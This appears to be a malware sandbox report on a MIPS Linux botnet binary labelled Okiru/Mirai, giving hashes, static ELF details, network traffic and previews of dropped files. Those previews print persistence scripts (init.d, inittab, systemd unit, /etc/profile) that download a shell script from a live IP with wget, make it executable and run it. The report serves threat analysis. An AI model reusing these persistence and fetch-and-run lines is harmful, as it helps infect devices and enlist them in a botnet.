	hmips.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nsharm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse	91.189.91.42
	mips.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	m68k.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	arm6.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	arm5.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
INIT7CH	arm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	hmips.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	nsharm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse	109.202.202.202
	mips.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	m68k.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	arm6.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	arm5.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
NETIXBG	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm5.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/mipsel.nn.elf	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	122
Entropy (8bit):	4.669693856826029
Encrypted:	false
SSDEEP:	3:KPJRXaw/iFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRl/mfoYZX48bbaaeXCO
MD5:	6E34D3CD24992F0E2B8E1EDC806358F9
SHA1:	2A73EFBE06FF1248F69716044272ACE0C8DECDC6
SHA-256:	23A64AD5E742E99A42FFAA0C46B10B247657BC5895DE4A1542F67BB1FE661609
SHA-512:	3D559F41A5E8CED20C1038C0B59DCDBC42646D6FB5E262F19F0E4F13EF3FAFAB4A493125F3369227F019C14E34ACB16EEF62C539714DF0EDB8C05C175670A3C6
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/mipsel.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/mipsel.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	410
Entropy (8bit):	4.519449750255623
Encrypted:	false
SSDEEP:	12:QRkio/MXNxuw/0/ePUJgjvMbw/6FxH/MuKN+dRRucSOyd3:b/2/0/ecIx/ul/3YOM3
MD5:	1FE3C77D4BFC384D88694556CA239DFD
SHA1:	75C0A180A6E2AA298A4C24866DDC3D6A9F6AF098
SHA-256:	9E809BE6063B9C07600212B7E878EA5A7B57E2E9BB0B5514F19BBC8C2F8A2372
SHA-512:	3E93C56C0DBE10FF5F7736E57F461C67CB600D6CCABA0AAF6B751C93AEEE00B519F6BA1DE23B881C1535A5E80D6A993BAF195E69923A12AC8DC0354F0B0C9420
Malicious:	true
Joe Sandbox View:	Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/mipsel.nn.elf..case "" in. start). echo 'Starting mipsel.nn.elf'. /tmp/mipsel.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping mipsel.nn.elf'. killall mipsel.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.626698510896325
Encrypted:	false
SSDEEP:	3:TKH4vZKaw/iFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8l/mzSXoZX48bzBeLXE0
MD5:	539F8D5E9F9630E7755AFC3255B83847
SHA1:	91DE1248768F868C0EB04F195696F677A9CDCD45
SHA-256:	68BA58E1ACE339B2C096378C5B6E300939F125E02859BEB4AC94C9A900F3E641
SHA-512:	EF7A47FA526F8E284110610389D82529C2D0F635235E69FFEAC28CDAE2A01C346B772A3FFBFA6E1C7097286A190143E2244236CAAB84876502F74B0C5B6B8740
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh./tmp/mipsel.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	114
Entropy (8bit):	4.594652553807888
Encrypted:	false
SSDEEP:	3:nAWu5Iw/iFDDoCvLdjX48FIbILbaaFOdFXa5O:AN/mfoYZX48bbaaeXCO
MD5:	6519B549572A81833E8C92B99EE17B7F
SHA1:	6BBBC13520CDFBF1D7A1B95118124A059116B0ED
SHA-256:	33B84F0C2411AA5338C06D292C50BF16A3E7A7E220D49ADEC32E881CD67CF1B3
SHA-512:	2634CDAC96A754D2A9EE1C23245A0E67D34ADA15ACC20D9144CEEADB6137CFD9A5CD1A8D3FA53229280B356CECDCA014CFB8B29ECF995112F948C6E763F861DE
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/mipsel.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	4.491314845702613
Encrypted:	false
SSDEEP:	3:Tgaw/iFDvSDRFiLdjX48FIbILbaaFOdFXa50:Tgl/mzSXoZX48bbaaeXC0
MD5:	AAF2E90396630CCF6A63DEA3968A287B
SHA1:	CF20411B5AE5B40FB111B0DB8B5A22ABFD6A28E7
SHA-256:	B7B8AE936784CA3DFFC0D2C5366F02B0A660896520B165744CFE72C0A8151253
SHA-512:	FADB72F2A204FA6A2AA5F8DDDD076B10B115A200909AA3390F031E4B91F287B866EAAE32B72EFF521DA7D6F2774C537D585514A8EEED4AB71BFB797061BBD475
Malicious:	true
Preview:	/tmp/mipsel.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	303
Entropy (8bit):	5.051178844874226
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+5/M02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+5/Mp+GWRdtd+GWRXY+GWRr
MD5:	44EB11E7055C1AD968CFD9407D450693
SHA1:	78B694FFAFEFE85FB8436DDDB15F3BCDF1CEA174
SHA-256:	AFADB28D87BB66E46AB6CDAF6F20047DCC3DD49DFBD0FDB4FE9DC8F55479ABF7
SHA-512:	34C5FEAB113C673CB6A94491571C3C10E554E35F07D53CA1E1F0AD33C4D87BAE52766A29069DA5D206B9DB771BF5F7407E6FD972FDF7C610A35730F883ED5EE9
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/mipsel.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.G1igFI (deleted)

Download File

Process:	/tmp/mipsel.nn.elf
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	19
Entropy (8bit):	3.5110854081804286
Encrypted:	false
SSDEEP:	3:Tgaw/iln:Tgl/Gn
MD5:	E161F2EC9C1A693BE77DD848C5A17087
SHA1:	C6DC3683D6AF6B3AD69F1E155638994278FD3DC9
SHA-256:	6EC0A33B73DE74EBEB61B23D54BFF44B920A3F994E0781781253974DB671921F
SHA-512:	79FEC2E25B4E40804C09089CDAC6D8A9C2FE0F90D096D6DEF3DE458D572EBE6D18740670BA9F33B45DAA80D4104252ECAAB075B44D5ED9BEDF8C5644DB302145
Malicious:	false
Preview:	/tmp/mipsel.nn.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.556539520812631
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mipsel.nn.elf
File size:	118'656 bytes
MD5:	c07c769680b684bce01e72800bd11635
SHA1:	ba5700e7489f5ae48ce165b58a43a68148978060
SHA256:	799df6ce4695925d10cb52f413cceda3b9045d9dfa3039f8c7fed403f423d2ea
SHA512:	83bc3670bbf8748fbe643a0c6f2371088ecd890c023edb0f00c8af7457ed1d55060a6ac2a8ac35ff34d9374dd9f2c5c16e3222e2d2306e29f85a7da801eb51c1
SSDEEP:	1536:X0MFEziYKeexkyxhY7SKRV8n2rMk0RpI4VcmO3ZZVemyGDP/PrGsi2v:bFEWYKdkuI4VXEp/rGsi2
TLSH:	31C3E706BB641FF7ECABCD3746BD170124CC585B12A92B353934E918F60E25B1AE3DA4
File Content Preview:	.ELF....................`.@.4...P.......4. ...(...............@...@.p...p.....................E...E.....\/..........Q.td...............................<.D.'!......'.......................<.D.'!... .........9'.. ........................<xD.'!.............9

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	118096
Section Header Size:	40
Number of Section Headers:	14
Header String Table Index:	13

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x18d60	0x0	0x6	AX	16
.fini	PROGBITS	0x418e80	0x18e80	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x418ee0	0x18ee0	0x2690	0x0	0x2	A	16
.ctors	PROGBITS	0x45c000	0x1c000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x45c008	0x1c008	0x8	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x45c014	0x1c014	0x54	0x0	0x3	WA	4
.data	PROGBITS	0x45c070	0x1c070	0x500	0x0	0x3	WA	16
.got	PROGBITS	0x45c570	0x1c570	0x77c	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x45ccec	0x1ccec	0x20	0x0	0x10000003	WAp	4
.bss	NOBITS	0x45cd10	0x1ccec	0x224c	0x0	0x3	WA	16
.mdebug.abi32	PROGBITS	0xe10	0x1ccec	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x1ccec	0x64	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x1b570	0x1b570	5.6640	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x1c000	0x45c000	0x45c000	0xcec	0x2f5c	4.1720	0x6	RW	0x10000	.ctors .dtors .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 09:42:52.173113108 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 09:42:54.201349020 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:54.320844889 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:54.320904970 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:54.321218014 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:54.440650940 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:54.842262983 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:55.004607916 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:55.445696115 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:55.445792913 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:55.845719099 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:55.965451956 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:55.965528011 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:55.965595007 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:56.087599993 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:56.478904009 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:56.644594908 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:57.097086906 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:57.097145081 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:57.481262922 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:57.600783110 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:57.600912094 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:57.600960016 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:57.720515013 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:57.804208040 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 09:42:58.160176039 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:58.320625067 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:58.723761082 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:58.723834991 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:58.828047991 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 09:42:59.161128998 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:59.280680895 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:59.280894995 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:59.280894995 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:59.400485039 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 09:42:59.785582066 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:42:59.948542118 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:00.406517982 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:00.406594992 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:00.786314964 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:00.905878067 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:00.905966043 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:00.905993938 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:01.025500059 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:01.409292936 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:01.576715946 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:02.023225069 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:02.023351908 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:02.410238981 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:02.529912949 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:02.529983997 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:02.530025005 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:02.649636030 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:03.033227921 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:03.202449083 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:03.662164927 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:03.662251949 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:04.034332037 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:04.154048920 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:04.154153109 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:04.154185057 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:04.274053097 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:04.658158064 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:04.820599079 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:05.556353092 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:05.556443930 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:05.648617983 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:05.648691893 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:05.659033060 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:05.768311977 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:05.778593063 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:05.778677940 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:05.778717041 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:05.898302078 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:06.281737089 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:06.444489956 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:06.910752058 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:06.910830021 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:07.282532930 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:07.402136087 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:07.402252913 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:07.402621031 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:07.522037983 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:07.906368971 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:08.072560072 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:08.531511068 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:08.531622887 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:08.907496929 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:09.027050018 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:09.027143002 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:09.027164936 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:09.146625042 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:09.532154083 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:09.692558050 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:10.155500889 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:10.155580997 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:10.533509016 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:10.653091908 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:10.653203011 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:10.653243065 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:10.773000002 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:11.158826113 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:11.324574947 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:11.779529095 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:11.779622078 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:12.159986973 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:12.279464960 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:12.279536963 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:12.279637098 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:12.399023056 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:12.650221109 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 09:43:12.784609079 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:12.944469929 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:13.403917074 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:13.403985023 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:13.785852909 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:13.905500889 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:13.905581951 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:13.905618906 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:14.025213957 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:14.410989046 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:14.572619915 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:15.038008928 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:15.038100004 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:15.412167072 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:15.532037973 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:15.532221079 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:15.532221079 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:15.651966095 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:16.035903931 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:16.200752974 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:16.654489994 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:16.654650927 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:17.036856890 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:17.156836987 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:17.156940937 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:17.156992912 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:17.276698112 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:17.660660982 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:17.820633888 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:18.285581112 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:18.285715103 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:18.661771059 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:18.781446934 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:18.781531096 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:18.781582117 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:18.901160002 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:19.285479069 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:19.448632002 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:19.906848907 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:19.906939983 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:20.286411047 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:43:20.406166077 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 09:43:20.406255007 CET	60042	38242	192.168.2.23	94.156.227.234
